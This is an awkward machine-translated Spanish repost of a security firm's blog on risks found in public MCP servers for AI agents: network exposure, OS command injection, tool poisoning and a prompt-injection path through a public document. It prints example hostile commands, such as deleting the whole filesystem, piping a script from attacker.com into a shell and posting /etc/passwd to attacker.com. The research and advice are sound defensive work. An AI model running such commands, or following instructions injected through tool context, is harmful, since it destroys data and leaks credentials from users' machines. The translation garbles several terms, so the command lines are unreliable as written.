Summarize this content to 600 words Los servidores del Protocolo de contexto del modelo (MCP) son infraestructura crítica para los agentes de IA, lo que permite el acceso a herramientas, documentos y entornos locales. Ya hemos blogueado sobre Riesgos principales MCP presentes en IDESy sobre el Tres tipos de riesgos de MCP y cómo evaluarlos. Ahora comprendamos algunos de los hallazgos de la investigación detrás de la cortina. El equipo de barra de inactividad realizó una investigación en miles de MCP de ejecución local disponible públicamente y analizó su código para una amplia gama de riesgos de seguridad, incluida la inyección inmediata, la manipulación de datos y la ejecución de carga útil maliciosa.Metodología y hallazgos claveEl equipo de Back -Slash analizó miles de servidores MCP disponibles públicamente. Al momento de escribir, cubrimos aproximadamente la mitad de lo que está disponible, y este es un esfuerzo continuo. Escaneamos MCP por vulnerabilidades de código y otras debilidades, y también las verificamos para obtener patrones maliciosos, que incluyen:Envenenamiento de herramientas: Instrucciones ocultas en descripciones de herramientas con el objetivo de subvertir el comportamiento de LLM/herramienta.Ataque de alfombra: La lógica de la herramienta registrada se cambia/reemplaza en el tiempo de ejecución por el código controlado por el atacante.Sombreado de la herramienta: Herramienta legítima reemplazada/anulada por una maliciosa.Exfiltración de datos: El código fugas deliberadamente datos confidenciales externamente, como secretos o robo de tokens.Entrada maliciosa de la puerta trasera: El código habilita deliberadamente el acceso no autorizado o persistente.Si bien nuestro análisis no arrojó MCP obviamente malicioso, encontramos un número sorprendente de servidores peligrosamente mal configurados o descuidados. Identificamos dos categorías generalizadas de debilidades, que cuando se combinan pueden causar un riesgo muy alto para el entorno y las aplicaciones del usuario.Exposición a la red – Vulnerabilidad de MCP ‘vecino’El problema más común que encontramos, con cientos de casos observados, fueron los servidores MCP que estaban explícitamente unidos a todas las interfaces de red (0.0.0.0), haciéndolos accesibles para cualquier persona en la misma red local. Riesgo del mundo real: Imagina que estás codificando en un espacio de coworking o café compartido. Su servidor MCP se ejecuta en silencio en su máquina. La persona que se sienta cerca de usted, bebe su café con leche, ahora puede acceder a su servidor MCP, suplantar herramientas y potencialmente ejecutar operaciones en su nombre. Es como dejar su computadora portátil abierta, y desbloqueado para todos en la habitación.Ejemplo de código:Este código expone el servidor MCP a cualquier persona en la red al vincularlo a todas las interfaces (0.0.0.0).Permisos excesivos e inyección de OSEl segundo problema más común, se descubrieron docenas de instancias, servidores MCP que permiten la ejecución de comandos arbitrarios en la máquina host. Ya sea a través del uso descuidado de un subproceso, falta de desinfección de entrada o errores de seguridad como el recorrido de la ruta.Riesgo del mundo real: El servidor MCP puede acceder al host que ejecuta el MCP y potencialmente permitir que un usuario remoto controle su sistema operativo.Ejemplo de código:A primera vista, esta función parece simple, toma una cadena (comando) y la ejecuta como un comando shell en el sistema. Cualquiera que sea la salida, regresa como una cadena.Pero hay un problema grave. Este código confía ciegamente en la entrada que recibe y lo ejecuta directamente en el shell del sistema. Si un atacante controla la entrada del comando, puede ejecutar Cualquier comando del sistema que deseen.Algunos ejemplos de lo que se puede ejecutar:Dominio: RM -RF /Lo que hace: Elimina todo en el sistema.Dominio: Curl http://attacker.com/script.sh | intentoLo que hace: Descarga y ejecuta código de hacker de Internet.Dominio: curl -x post -d @/etc/passwd http://attacker.com/leakLo que hace: Sube el archivo de contraseña del sistema a un servidor controlado por el atacante.Una combinación tóxica críticaCuando la exposición a la red cumple con los permisos excesivos, obtienes la tormenta perfecta. Cualquier persona en la misma red puede tomar el control completo de la máquina host que ejecuta el servidor MCP, sin inicio de sesión, sin autorización, sin Sandbox. Simplemente el acceso completo para ejecutar cualquier comando, memoria raspada o herramientas de suplantación utilizadas por los agentes de IA.Y sí, encontramos varios servidores con esta combinación exacta.La imagen más grande: riesgo de IA a través del abuso de contextoMás allá de la ejecución del código, los MCP pueden servir como vías sigilosas para inyección rápida y envenenamiento con contexto. El contenido público malicioso o manipulado puede cambiar lo que ve un LLM: devolver datos engañosos o lógica de agentes de red.Como parte de esta investigación, en un hallazgo aún por liberar, identificamos una ruta de exploit que involucra un documento público aparentemente benigno que se convierte en el desencadenante de un compromiso en cascada, porque el MCP lo conectó en silencio en la lógica del agente de LLM sin límites adecuados. El problema no fue una vulnerabilidad en el código MCP en sí, sino en la configuración de la fuente de datos a la que accedió. Este problema afecta una herramienta muy popular con 10,000s de usuarios, y actualmente estamos trabajando con el proveedor para coordinar la divulgación responsable.Lo que puedes hacer hoyRecomendaciones para los consumidores de MCPPara apoyar a la comunidad, lanzamos el Centro de seguridad del servidor MCP de barra de barra de barra – Una base de datos de riesgos MCP de MCP en vivo. Incluye datos de editores no verificados, mientras que los hallazgos de Repos verificados están bajo divulgación responsable.Alentamos a cualquier persona que considere usar un servidor MCP para que primero lo busque en el Hub, para asegurarse de que sea seguro de usar.Centro de seguridad del servidor MCP Back -savlash: https://mcp.backslash.securityRecomendaciones para equipos de seguridadBackslash también ofrece un herramienta de autoevaluación que escanea el entorno de sus desarrolladores para:Servidores MCP activosComplementos IDE arriesgadosConfiguraciones erróneas de la regla AILLMS desprotegidos/no aprobados Obtendrá visibilidad en minutos, y es gratis (requiere registro)Dashboard de autoevaluación de barra de barra de barra de barra de barra de barra de barra de barra de barra de barra de barra de barra de barra de barra de gran descarga: https://mcp.backslash.securityRecomendación para desarrolladores de MCPSi planea escribir su propio MCP (que es muy fácil de hacer), asegúrese de seguir estas mejores prácticas:Preferir stdio transporte para herramientas locales de MCP en lugar de SSE (Eventos del servidor). Si se requiere SSE localmente, restringir el acceso a 127.0.0.1 soloValidar y desinfectar todas las entradas externasespecialmente los datos utilizados en:Rápida construcciónRutas de archivoSolicitudes de redEjecuciones de shell/commandRestringir el acceso al sistema de archivos: Limite las operaciones de lectura/escritura a directorios predefinidos.Evite filtrar datos internos (por ejemplo, secretos, tokens o registros internos) en respuestas de herramientas o indicaciones LLM.Implementar controles de acceso claros en API y funciones de herramientas para garantizar que solo se permitan llamadas autorizadas.Valide la fuente de los datos que recibe su agente LLM para evitar el intoxicación de la fuente de datos potencial.
Enlace de la fuente, haz clic para tener más información
Enlace de la fuente, haz clic para tener más información